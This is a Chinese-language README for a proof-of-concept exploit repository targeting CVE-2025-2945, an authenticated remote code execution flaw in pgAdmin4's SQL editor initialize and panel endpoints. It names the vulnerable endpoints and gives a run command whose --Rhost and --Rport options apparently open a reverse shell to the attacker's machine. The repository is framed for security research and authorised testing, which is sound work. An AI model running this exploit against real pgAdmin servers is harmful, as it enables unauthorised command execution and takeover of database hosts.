本仓库包含一个概念验证脚本,专为安全研究和授权渗透测试而创建,涉及影响 pgAdmin4 特定版本的漏洞 CVE-2025-2945。
该问题允许拥有 SQL 编辑器访问权限的已认证 pgAdmin 用户,通过滥用查询工具面板初始化流程来触发远程代码执行。此 PoC 仅用于教育、审计和防御目的演示该漏洞。
本工具仅供以下用途:
未经明确许可,请勿在任何系统上使用此工具。 未授权使用是非法且不道德的。 作者不对滥用行为负责。
该漏洞源于 SQL 编辑器初始化端点中的逻辑缺陷。在与 /sqleditor/initialize/ 和 /sqleditor/panel/ 交互时,应用程序错误地处理了用户可控数据,最终允许精心构造的 Payload 执行任意后端命令。
该 PoC 利用以下端点序列:
requests 库python3 poc.py \
--target-url <pgadmin-url> \
--username <pgadmin-user> \
--password <pgadmin-pass> \
--db-user <db-username> \
--db-pass <db-password> \
--db-name <database> \
--Rhost <your-ip> \
--Rport <your-port>
(脚本的帮助部分已提供完整示例。)
poc.py → The exploit proof-of-concept
README.md → Project documentation
管理员应:
作者: UdayVeer